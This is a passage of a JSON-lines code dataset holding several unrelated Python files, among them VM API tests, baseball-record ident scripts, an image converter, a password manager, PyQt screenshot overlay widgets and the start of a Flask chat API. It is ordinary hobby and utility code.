cvds = vm.get_cvds(by='POLICY_NAME', value=config.cvd_1['policyname'], query_type='ENDS_WITH')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='CONNECTION_STATE', value=False, query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='CLIENT_STATUS', value='Idle', query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='PROGRESS', value=100, query_type='NOT_EQUALS')\n assert len(cvds) >= 1\n\n\ndef test_get_collection_cvds():\n cvds = vm.get_collection_cvds(config.collection['id'])\n assert len(cvds) >= 1\n\n\ndef test_get_app_layers():\n layers = vm.get_app_layers()\n assert len(layers) >= 1\n\n layer = vm.get_app_layers(by='ID', value=config.app_layer['id'], query_type='EQUALS')[0]\n assert layer.Name == config.app_layer['name']\n\n layers = vm.get_app_layers(by='NAME', value=config.app_layer['name'])\n assert len(layers) >= 1\n\n\ndef test_get_base_layers():\n layers = vm.get_base_layers()\n assert len(layers) >= 1\n\n layer = vm.get_base_layers(by='ID', 
value=config.base_layer['id'], query_type='EQUALS')[0]\n assert layer.Name == config.base_layer['name']\n\n layers = vm.get_base_layers(by='NAME', value=config.base_layer['name'])\n assert len(layers) >= 1\n\n\ndef test_get_collections():\n colls = vm.get_collections(by='ID', value=config.collection['id'], query_type='EQUALS')\n assert len(colls) == 1\n\n colls = vm.get_collections(by='NAME', value=config.collection['name'])\n assert len(colls) >= 1\n\n colls = vm.get_collections(by='DESCRIPTION', value=config.collection['description'], query_type='CONTAINS')\n assert len(colls) >= 1\n\n\ndef test_get_pending_devices():\n pends = vm.get_pending_devices(by='DEVICE_ID', value=config.pending['deviceid'], query_type='EQUALS')\n assert len(pends) == 1\n\n pends = vm.get_pending_devices(by='NAME', value=config.pending['name'])\n assert len(pends) == 1\n\n pends = vm.get_pending_devices(by='USER_NAME', value=config.pending['username'], query_type='CONTAINS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='CONNECTION_STATE', value=False, query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='MODEL_NAME', value=config.pending['model'], query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='VENDOR_NAME', value=config.pending['vendor'], query_type='EQUALS')\n assert len(pends) >= 1\n\n pends = vm.get_pending_devices(by='OS_VERSION', value=config.pending['os'], query_type='EQUALS')\n assert len(pends) >= 1\n\n\ndef test_get_policies():\n pols = vm.get_policies(by='ID', value=config.policy['id'], query_type='EQUALS')\n assert len(pols) == 1\n\n pols = vm.get_policies(by='NAME', value=config.policy['name'], query_type='EQUALS')\n assert len(pols) == 1\n\n\ndef test_get_volumes():\n vols = vm.get_volumes(by='ID', value=config.volume['id'], query_type='EQUALS')\n assert len(vols) == 1\n\n vols = vm.get_volumes(by='NAME', value=config.volume['name'], query_type='EQUALS')\n assert len(vols) == 1\n\n vols = vm.get_volumes(by='PATH', value=config.volume['path'], query_type='EQUALS')\n","sub_path":"tests/test_main_functions.py","file_name":"test_main_functions.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"535442551","text":"\"\"\"Update person ident lists from source records.\n\"\"\"\nimport pathlib\n\nimport pandas as pd\n\n\ndef extract_with_source(path, source, **kwargs):\n \"\"\"Helper function to extract a CSV file and add a 'source' column.\n \"\"\"\n try:\n return pd.read_csv(path, dtype=str, encoding='utf-8', **kwargs) \\\n .assign(source=source)\n except IOError:\n return pd.DataFrame()\n\n\ndef collect_from_palmer(path):\n \"\"\"Collect playing records from Palmer rosters.\n \"\"\"\n print(\"Collecting items from Palmer dataset.\")\n return extract_with_source(path/\"playing_individual.csv\",\n \"palmer\")\n\ndef collect_from_averages(path):\n \"\"\"Collect playing and managing performance records from\n minoraverages repository.\n \"\"\"\n print(\"Collecting items from minoraverages dataset.\")\n return [pd.concat([extract_with_source(sourcepath/\"playing_individual.csv\",\n \"minoraverages/\"+sourcepath.name)\n for sourcepath in (path/\"processed\").glob(\"*\")] +\n [extract_with_source(\n sourcepath/\"managing_individual.csv\",\n \"minoraverages/\" + sourcepath.name\n )\n for sourcepath in (path/\"processed\").glob(\"*\")],\n sort=True, ignore_index=True)]\n\n\ndef collect_from_boxscores(path):\n \"\"\"Collect people 
entries from boxscores repository.\n \"\"\"\n print(\"Collecting players from boxscores dataset.\")\n players = pd.concat([extract_with_source(sourcepath/\"players.csv\",\n \"/\".join([\"boxscores\",\n sourcepath.parts[-2],\n sourcepath.parts[-1]]))\n for sourcepath in\n (path/\"data\"/\"boxscores\"/\"processed\").glob(\"*/*\")],\n ignore_index=True)\n umpires = pd.concat([extract_with_source(sourcepath/\"umpires.csv\",\n \"/\".join([\"boxscores\",\n sourcepath.parts[-2],\n sourcepath.parts[-1]]))\n for sourcepath in\n (path/\"data\"/\"boxscores\"/\"processed\").glob(\"*/*\")],\n ignore_index=True)\n umpires['entry.name'] = \"#umpire\"\n return [players, umpires]\n\n\ndef collect_retrosheet_rosters(path_retro, year):\n \"\"\"Collect the roster files from the Retrosheet repository for 'year'.\n \"\"\"\n return pd.concat([pd.read_csv(fn, dtype=str, encoding='utf-8',\n header=None,\n names=['person.ref',\n 'person.name.last',\n 'person.name.given',\n 'bats', 'throws', 'team.key', 'pos'],\n usecols=['person.ref', 'team.key',\n 'person.name.last',\n 'person.name.given'])\n for fn in (path_retro/\"rosters\").glob(\"*%s.ROS\" % year)],\n sort=False, ignore_index=True)\n\n\ndef collect_from_retrosheet(path_splits, path_retro):\n \"\"\"Collect playing entries from retrosplits repository.\n \"\"\"\n print(\"Collecting items from Retrosheet dataset.\")\n dflist = []\n teams = pd.read_csv(\"support/retroteams.csv\", dtype=str, encoding='utf-8')\n for year in range(1906, 1920):\n df = pd.read_csv(path_splits/\"daybyday\"/(\"playing-%d.csv\" % year),\n dtype=str, encoding='utf-8',\n usecols=['person.key', 'team.key', 'game.date']) \\\n .groupby(['person.key', 'team.key'])['game.date'] \\\n .agg(['min', 'max']) \\\n .set_axis(['S_FIRST', 'S_LAST'],\n axis='columns', inplace=False) \\\n .reset_index()\n df['league.year'] = df['S_FIRST'].str.split('-').str[0]\n df = df.merge(teams, how='left', on=['league.year', 'team.key']) \\\n .rename(columns={'person.key': 'person.ref'}) \\\n .assign(source=\"retrosheet/%s\" % year) \\\n .merge(collect_retrosheet_rosters(path_retro, year),\n how='left', on=['person.ref', 'team.key'])\n dflist.append(df[['source', 'league.year', 'league.name',\n 'person.ref',\n 'person.name.last', 'person.name.given',\n 'entry.name', 'S_FIRST', 'S_LAST']])\n return dflist\n\n\ndef extract_idents(path):\n \"\"\"Compile the existing ident files. 
'path' is the root of the repository\n of person ident files.\n \"\"\"\n print(\"Collecting identfiles\")\n idents = pd.concat([pd.read_csv(fn, dtype=str, encoding='utf-8')\n for fn in path.glob(\"*/*.csv\")],\n ignore_index=True, sort=False)\n for col in ['person.name.given', 'S_STINT']:\n idents[col] = idents[col].fillna(\"\")\n return idents[['ident', 'source', 'league.year', 'league.name',\n 'person.ref', 'person.name.last', 'person.name.given',\n 'S_STINT', 'entry.name']]\n\n\ndef extract_sources():\n \"\"\"Collect up person references from the various sources.\n \"\"\"\n retrolist = collect_from_retrosheet(\n path_splits=pathlib.Path(\"../retrosplits\"),\n path_retro=pathlib.Path(\"../retrosheet\")\n )\n palmer = [\n collect_from_palmer(pathlib.Path(\"../palmer/minors/data/processed\"))\n ]\n avglist = collect_from_averages(pathlib.Path(\"../minoraverages\"))\n boxlist = collect_from_boxscores(pathlib.Path(\"../boxscores\"))\n print(\"Concatenating files...\")\n return pd.concat(retrolist + palmer + avglist + boxlist,\n sort=False, ignore_index=True)\n\n\ndef clean_sources(df):\n \"\"\"Clean up source records into a standard format.\n \"\"\"\n # Fill in an indicator for records which indicate a position played\n # but not games at that position\n df[\"pos\"] = \"\"\n for pos in [\"P\", \"C\", \"1B\", \"2B\", \"3B\", \"SS\", \"OF\", \"LF\", \"CF\", \"RF\"]:\n if f\"F_{pos}_G\" in df and f\"F_{pos}_POS\" in df:\n df[f\"F_{pos}_G\"] = (\n df[f\"F_{pos}_G\"].fillna(\n df[f\"F_{pos}_POS\"].apply(\n lambda x:\n \"\" if not pd.isnull(x) and int(x) > 0\n else None\n )\n )\n )\n df[\"pos\"] += df[f\"F_{pos}_G\"].apply(lambda x:\n pos.lower() + str(x) + \",\"\n if not pd.isnull(x) and x != \"0\"\n else \"\")\n df[\"pos\"] = df[\"pos\"].str.rstrip(\",\")\n for col in ['person.name.given', 'S_STINT']:\n df[col] = df[col].fillna(\"\")\n # We convert dates to YYYYMMDD. This way, ident files can be loaded\n # into e.g. 
Excel for editing, without messing up the formatting.\n    # YYYYMMDD is considered a valid ISO date format as well.\n    for col in ['S_FIRST', 'S_LAST']:\n        df[col] = df[col].str.replace(\"-\", \"\")\n    return df\n\n\ndef merge_idents(df, idents):\n    \"\"\"Apply existing person reference identifications to dataset of sources.\n    \"\"\"\n    if not idents.empty:\n        df = df.merge(idents, how='left',\n                      on=['source', 'league.year', 'league.name',\n                          'person.ref',\n                          'person.name.last', 'person.name.given',\n                          'S_STINT', 'entry.name'])\n    else:\n        df['ident'] = None\n    return (\n        df[['source', 'league.year', 'league.name', 'ident', 'person.ref',\n            'person.name.last', 'person.name.given',\n            'S_STINT', 'entry.name',\n            'S_FIRST', 'S_LAST', 'B_G', 'P_G', 'pos']]\n        .drop_duplicates()\n        .sort_values(['league.year', 'league.name',\n                      'person.name.last', 'source', 'person.ref'])\n    )\n\n\ndef load_idents(df, path):\n    \"\"\"Write out ident files to disk repository.\n    \"\"\"\n    print(\"Writing ident files...\")\n    for ((year, league), data) in df.groupby(['league.year', 'league.name']):\n        # We only generate ident files for leagues where we have\n        # either an averages compilation or boxscore data\n        sample = data[data['source'].str.startswith('retrosheet/') |\n                      data['source'].str.startswith('minoraverages/') |\n                      data['source'].str.startswith('boxscores/')]\n        if sample.empty:\n            continue\n        print(year, league)\n        (path / year).mkdir(exist_ok=True)\n        filepath = (path / year /\n                    (\"%s%s.csv\" %\n                     (year, league.replace(\" \", \"\").replace(\"-\", \"\"))))\n        data.to_csv(filepath, index=False, encoding='utf-8')\n\n\ndef main():\n    \"\"\"Update person ident lists from source records.\n    \"\"\"\n    ident_path = pathlib.Path(\"data/ident/people\")\n    idents = extract_idents(ident_path)\n    extract_sources().pipe(clean_sources) \\\n                     .pipe(merge_idents, idents) \\\n                     .pipe(load_idents, ident_path)\n","sub_path":"hgame/ident/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"112563789","text":"# 1. Write python code that approximates the solution to the Basel problem\r\n# (Note: if you don't know what the Basel problem is you can look it up, but please don't try to copy answers from the internet)\r\n\r\nimport math\r\n\r\ndef TheBaselProblem(N):\r\n    BP_num = 0\r\n    for i in range(1,N+1):\r\n        BP_num+=1/(i*i)\r\n    return BP_num\r\n\r\nif __name__ == '__main__':\r\n    N = int(1e6)\r\n    BP_value = TheBaselProblem(N)\r\n    print(\r\n        \"Basel problem approximation: %s\\nError versus the true value: %s\"\r\n        %(BP_value,math.pi*math.pi/6-BP_value)\r\n    )\r\n\r\n
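# Note: the tail of the series beyond N sums to about 1/N, so N = 1e6 leaves an\r\n# error of roughly 1e-6 in the approximation above.\r\n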
\r\n# 2. What is the value of sqrt(1+2*sqrt(1+3*sqrt(1+4*sqrt(1+...))))?\r\n# (Hint: question 2 can be done with python or worked out by hand; just give the result)\r\n# Answer: 3","sub_path":"Ag/MyCode/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184017239","text":"from sqlalchemy_declarative import User, Base\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite:///proxy.db', echo=True)\nBase.metadata.bind = engine\nfrom sqlalchemy.orm import sessionmaker\nDBSession = sessionmaker()\nDBSession.bind = engine\nsession = DBSession()\n# Make a query to find all Persons in the database\nsession.query(User).all()\n# Return the first Person from all Persons in the database\nperson = session.query(User).first()\nperson.username\n# Find all Address whose person field is pointing to the person object\n#session.query(Address).filter(Address.person == person).all()\n# Retrieve one Address whose person field is pointing to the person object\n#session.query(Address).filter(Address.person == person).one()\n#address = session.query(Address).filter(Address.person == person).one()\n#address.post_code\n","sub_path":"__src__/working/db_model/sql_test.py","file_name":"sql_test.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"217698167","text":"from PIL import Image\nimport os\n\ndef IsValidImage(img_path):\n    \"\"\"\n    Check whether the file is a valid (complete) image\n    :param img_path: path to the image\n    :return: True: valid  False: invalid\n    \"\"\"\n    bValid = True\n    try:\n        Image.open(img_path).verify()\n    except:\n        bValid = False\n    return bValid\n\n\ndef transimg(img_path):\n    \"\"\"\n    Convert the image format\n    :param img_path: path to the image\n    :return: True: success  False: failure\n    \"\"\"\n    if IsValidImage(img_path):\n        try:\n            str = img_path.rsplit(\".\", 1)\n            output_img_path = str[0] + \".jpg\"\n            print(output_img_path)\n            im = Image.open(img_path)\n            im.convert('RGB').save(output_img_path)\n            return True\n        except:\n            return False\n    else:\n        return False\n\n\nif __name__ == '__main__':\n    for maindir, subdir, file_name_list in os.walk(\"./\"):\n        for filename in file_name_list:\n            ext = os.path.splitext(filename)[1]\n            if ext == \".png\":\n                print(transimg(filename))\n","sub_path":"screenshoot/png2jpg.py","file_name":"png2jpg.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"549553090","text":"from decrypt import *\nfrom encrypt import *\nfrom saves import *\nfrom pprint import pprint as pprint\n\nraw_data = read_file('data.txt')\n\nprint('\\n\\n--------------------------------------------------------------------------------')\nprint('Password Manager')\nprint('--------------------------------------------------------------------------------\\n')\nwhile True:\n    ENCRYPTION_KEY = input('Enter ENCRYPTION_KEY: ')\n    if ENCRYPTION_KEY.isdigit():\n        ENCRYPTION_KEY = int(ENCRYPTION_KEY)\n        break\n    else:\n        print('ENCRYPTION_KEY has to be convertible to an integer. 
Returning HOME.')\n continue\n\n\nprint('Decrypting with key...\\n\\n')\ndata = decrypt(raw_data, ENCRYPTION_KEY)\n\nwhile True:\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to GET DATA')\n print('Press \\'2\\' \\t\\t\\t+ \\'ENTER\\' to SET DATA')\n print('Press any other button \\t\\t+ \\'ENTER\\' to EXIT')\n user_input = input('>> ')\n\n print('\\nAllowed characters:')\n print('Digits, Letters (big/small, including ÄÖÜ), Special Characters (@.:/- [SPACE])\\n')\n\n # Getting Data\n if user_input == '1':\n\n print('\\nDATA_KEYs\\n--------------------------------------------------------------------------------')\n for key in data.keys():\n print(key)\n DATA_KEY = input('\\nDATA_KEY for DESIRED ENTRY: ')\n\n if DATA_KEY in data.keys():\n pprint(data[DATA_KEY])\n user_input = input('Press ENTER to return HOME')\n\n else:\n print('INVALID DATA_KEY. Returning HOME.')\n\n # Setting Data\n elif user_input == '2':\n print('\\nPress \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CREATE NEW ENTRY')\n print('Press \\'2\\' \\t\\t\\t+ \\'ENTER\\' to CHANGE EXISTING')\n user_input = input('>> ')\n\n # Creating New Entry\n if user_input == '1':\n DATA_KEY = input('\\nDATA_KEY for NEW ENTRY: ')\n if DATA_KEY in data.keys():\n print('DATA_KEY ALREADY EXISTING.\\n')\n print()\n else:\n data[DATA_KEY] = {}\n while True:\n ENTRY_KEY = input('ENTRY_KEY: ')\n if ENTRY_KEY in data[DATA_KEY].keys():\n print('ENTRY_KEY ALREADY EXISTING.')\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to TRY AGAIN')\n print('Press any other button \\t\\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == '1':\n continue\n else:\n break\n else:\n ENTRY_VALUE = input('ENTRY_VALUE: ')\n data[DATA_KEY][ENTRY_KEY] = ENTRY_VALUE\n print('Created \\'' + ENTRY_VALUE + '\\' as \\'' + ENTRY_KEY + '\\' in ' + DATA_KEY)\n print('\\nPress \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CREATE MORE ENTRIES')\n print('Press any other button \\t\\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == '1':\n pass\n else:\n break\n\n # Changing Entry\n elif user_input == '2':\n DATA_KEY = input('\\nDATA_KEY for DESIRED ENTRY: ')\n if DATA_KEY not in data.keys():\n print('INVALID DATA_KEY. Returning HOME.')\n else:\n while True:\n pprint(data[DATA_KEY])\n ENTRY_KEY = input('ENTRY_KEY for DESIRED ENTRY: ')\n if ENTRY_KEY not in data[DATA_KEY].keys():\n print('INVALID ENTRY_KEY. Returning HOME.') # + add ENTRY_KEY\n else:\n ENTRY = input('New ENTRY: ')\n data[DATA_KEY][ENTRY_KEY] = ENTRY\n print('Changed ENTRY to ' + data[DATA_KEY][ENTRY_KEY])\n print('Press \\'1\\' \\t\\t\\t+ \\'ENTER\\' to CHANGE MORE ENTRIES')\n print('Press any other button \\t+ \\'ENTER\\' to RETURN HOME')\n user_input = input('>> ')\n if user_input == '1':\n pass\n else:\n break\n\n else:\n print('INVALID INPUT. 
Returning HOME.')\n\n else:\n print('')\n if ENCRYPTION_KEY is not '':\n write_file(encrypt(data, ENCRYPTION_KEY))\n print('\\n\\n')\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"438626383","text":"#!/usr/bin/python3\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QSize, Qt\nfrom processing import SHOTNAME, SHOTPATH\n\nclass BaseLayer(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n __screen = QtWidgets.QDesktopWidget().screenGeometry(-1)\n self.height, self.width = __screen.height(), __screen.width()\n self.setGeometry(0,0,self.width,self.height)\n self.rectx, self.recty, self.rectw, self.recth = [0 for i in range(4)]\n self.setCursor(QtGui.QCursor(QtGui.QCursor(QtCore.Qt.CrossCursor)))\n self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint | QtCore.Qt.X11BypassWindowManagerHint)\n self.begin = QtCore.QPoint()\n self.end = QtCore.QPoint()\n\nclass LoopZoop(BaseLayer): \n def __init__(self):\n super().__init__()\n self.zoom = 4\n self.initUI()\n self.setGeometry((self.width - 165), 15, 120, 120)\n self.view.setFrameShape(QtWidgets.QFrame.NoFrame)\n\n def initUI(self): \n self.img = QtGui.QPixmap(SHOTPATH[0])\n self.scene = QtWidgets.QGraphicsScene()\n self.scene.addPixmap(self.img)\n self.view = QtWidgets.QGraphicsView(self.scene, self)\n self.view.scale(self.zoom, self.zoom)\n\nclass Crosshair(LoopZoop):\n def __init__(self):\n super().__init__()\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.zoom = 1\n self.initUI()\n self.setWindowOpacity(0.15)\n\n def initUI(self):\n self.img = QtGui.QPixmap(\"{}/src/crosshair.png\".format(sys.path[0]))\n self.scene = QtWidgets.QGraphicsScene()\n self.scene.addPixmap(self.img)\n self.view = QtWidgets.QGraphicsView(self.scene, self)\n self.view.scale(self.zoom, self.zoom)\n\nclass LePalette(BaseLayer): \n def __init__(self):\n super().__init__()\n self.setGeometry((self.width / 2 - 120), (self.height - 46), 240, 20)\n self.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.pen = \"#e81832\"\n self.brush = 0\n self.initUI()\n\n def initUI(self):\n red, blue, green, yellow, black, white = [QtWidgets.QPushButton(\"\", self) for i in range(0, 6)]\n self.fill = QtWidgets.QCheckBox(\"\", self)\n red.setGeometry(0, 0, 20, 20)\n red.setStyleSheet(\"background-color: #e81832; border: 2px solid black; border-radius: 8px;\")\n red.clicked.connect(self.redded)\n blue.setGeometry(20, 0, 20, 20)\n blue.setStyleSheet(\"background-color: #2459c8; border: 2px solid black; border-radius: 8px;\")\n blue.clicked.connect(self.blued)\n green.setGeometry(40, 0, 20, 20)\n green.setStyleSheet(\"background-color: #23c84f; border: 2px solid black; border-radius: 8px;\")\n green.clicked.connect(self.greened)\n yellow.setGeometry(60, 0, 20, 20)\n yellow.setStyleSheet(\"background-color: #c8ac23; border: 2px solid black; border-radius: 8px;\")\n yellow.clicked.connect(self.yellowed)\n black.setGeometry(80, 0, 20, 20)\n black.setStyleSheet(\"background-color: black; border: 2px solid white; border-radius: 8px;\")\n black.clicked.connect(self.blacked)\n white.setGeometry(100, 0, 20, 20)\n white.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 8px;\")\n white.clicked.connect(self.whited)\n self.info = QtWidgets.QLabel(self)\n 
self.info.setText('Fill:')\n self.info.move(150, 1)\n self.info.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 4px;\")\n self.fill.setGeometry(190, 0, 20, 20)\n\n @QtCore.pyqtSlot()\n def redded(self):\n self.pen = \"#e81832\"\n def blued(self):\n self.pen = \"#2459c8\"\n def greened(self):\n self.pen = \"#23c84f\"\n def yellowed(self):\n self.pen = \"#c8ac23\"\n def blacked(self):\n self.pen = \"black\"\n def whited(self):\n self.pen = \"white\"\n\nclass Toolkit(BaseLayer):\n def __init__(self):\n super().__init__()\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.setGeometry((self.width / 2 - 120), (self.height - 25), 240, 25)\n self.setWindowOpacity(0.85)\n self.switch = 0\n self.thickness = 4\n self.isopened = 0\n self.initUI()\n\n def update_label(self):\n self.drawThickness.setText(\"Thickness: {}\".format(self.thickness))\n self.drawThickness.update()\n\n def initUI(self):\n select, blur, circle, rectangle, line = [QtWidgets.QPushButton(\"\", self) for i in range(0, 5)]\n self.drawThickness = QtWidgets.QLabel(self)\n self.drawThickness.setText(\"Thickness: {}\".format(self.thickness))\n self.drawThickness.setFixedWidth(92)\n self.drawThickness.move(150, 4)\n self.drawThickness.setStyleSheet(\"background-color: white; border: 2px solid black; border-radius: 4px;\")\n\n select.clicked.connect(self.selected)\n select.setGeometry(0, 0, 24, 24)\n select.setIcon(QtGui.QIcon(\"{}/src/selection.png\".format(sys.path[0])))\n select.setIconSize(QtCore.QSize(18, 18))\n select.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n blur.setIcon(QtGui.QIcon(\"{}/src/blur.png\".format(sys.path[0])))\n blur.setIconSize(QtCore.QSize(18, 18))\n blur.clicked.connect(self.blurred)\n blur.setGeometry(25, 0, 24, 24)\n blur.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n circle.setIcon(QtGui.QIcon(\"{}/src/circle.png\".format(sys.path[0])))\n circle.setIconSize(QtCore.QSize(18, 18))\n circle.clicked.connect(self.circled)\n circle.setGeometry(50, 0, 24, 24)\n circle.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n rectangle.setIcon(QtGui.QIcon(\"{}/src/rectangle.png\".format(sys.path[0])))\n rectangle.setIconSize(QtCore.QSize(18, 18))\n rectangle.clicked.connect(self.rectangled)\n rectangle.setGeometry(75, 0, 24, 24)\n rectangle.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n line.setIcon(QtGui.QIcon(\"{}/src/line.png\".format(sys.path[0])))\n line.setIconSize(QtCore.QSize(18, 18))\n line.clicked.connect(self.lined)\n line.setGeometry(100, 0, 24, 24)\n line.setStyleSheet(\"QPushButton { background-color: white; border: 2px solid black; border-radius: 4px; }\\\n QPushButton:pressed { background-color: #acacac; }\")\n\n @QtCore.pyqtSlot()\n def lined(self):\n self.switch = 4\n def rectangled(self):\n self.switch = 3\n def circled(self):\n self.switch = 2\n def blurred(self):\n self.switch = 1\n def selected(self):\n self.switch = 
0\n","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118489082","text":"from flask import Flask, jsonify, request, session, flash\nfrom flask_cors import CORS, cross_origin\nfrom functools import wraps\nfrom handler import Chat\nfrom handler import Post\nfrom handler import User\nfrom dao.PostDAO import PostDAO\nfrom dao.UserDAO import UserDAO\nimport os\n\npostDao = PostDAO()\nuserDao = UserDAO()\n\napp = Flask(__name__)\nCORS(app, supports_credentials=True)\n\napp.config['DEBUG'] = True\napp.config['SECRET_KEY'] = 'pictochat'\napp.config['UPLOAD_FOLDER'] = '/static'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\n# Check if user is logged in\ndef is_logged_in(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('Unauthorized, please log in.', 'danger')\n return jsonify(Error=\"Unauthorized, please log in.\"), 404\n\n return wrap\n\n# Check file extension\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/Pictochat') # OK\ndef homeforApp():\n return \"Welcome to Pictochat\"\n\n\n###################### Users Routes ############################\n\n@app.route('/Pictochat/users/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n return User.register(request.json)\n return jsonify(Error=\"Method not allowed.\"), 405\n\n\n# Login\n@app.route('/Pictochat/users/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n result = User.login(request.json)\n return result\n return jsonify(Error=\"Method not allowed.\"), 405\n\n\n# Logout\n@app.route('/Pictochat/users/logout')\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef logout():\n session.clear()\n flash(\"You are now logged out.\", \"success\")\n return jsonify(LoggedOut='Logged out')\n\n\n# TODO: need query return all users in the system except current_user (logged), and users on his contactList.\n@app.route('/Pictochat/users/all', methods=['GET'])\ndef getAllUsers():\n if request.method == 'GET':\n result = User.getAllUsers()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/logged', methods=['GET'])\ndef getAllUsersNotSession():\n if request.method == 'GET':\n result = User.getAllUsersNotSession()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/', methods=['GET'])\ndef getUserByID(user_id):\n if request.method == 'GET':\n result = User.getUserInfo(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/users/username/', methods=['GET'])\ndef getUserByUsername(username):\n if request.method == 'GET':\n result = User.getUserByUsername(username)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//likes', methods=['GET'])\ndef getUsersWhoLikedPost(post_id):\n if request.method == 'GET':\n result = User.getUsersWhoLikedPost(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//dislikes', methods=['GET'])\ndef getUsersWhoDislikedPost(post_id):\n if request.method == 'GET':\n result = User.getUsersWhoDislikedPost(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 
405\n\n\n@app.route('/Pictochat/chat/<chat_id>/users', methods=['GET'])\ndef getUsersByChatID(chat_id):\n if request.method == 'GET':\n result = User.getUsersByChatID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat/<chat_id>/admin', methods=['GET'])\ndef getAdminByChatID(chat_id):\n if request.method == 'GET':\n result = User.getAdminByChatID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Credential Routes ######################\n\n@app.route('/Pictochat/credentials/all', methods=['GET'])\ndef getCredentials():\n if request.method == 'GET':\n result = User.getAllCredentials()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/credentials/user/<user_id>', methods=['GET'])\ndef getUserCredentialByID(user_id):\n if request.method == 'GET':\n result = User.getUserCredentials(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Activity Routes ########################\n\n@app.route('/Pictochat/activity/all', methods=['GET'])\ndef getAllActivities():\n if request.method == 'GET':\n result = User.getAllActivity()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/activity/user/<user_id>', methods=['GET'])\ndef getUserActivityByID(user_id):\n if request.method == 'GET':\n result = User.getUserActivity(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Contacts Routes ######################\n\n@app.route('/Pictochat/user/<user_id>/contacts', methods=['GET', 'POST'])\ndef getUserContactsByID(user_id):\n if request.method == 'GET':\n result = User.getUserContactsByID(user_id)\n return result\n elif request.method == 'POST':\n result = User.addContacts(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Chat Routes ############################\n\n@app.route('/Pictochat/chats/new', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef createChat():\n if request.method == 'POST':\n User.registerActivity()\n return Chat.createChat(request.json)\n return 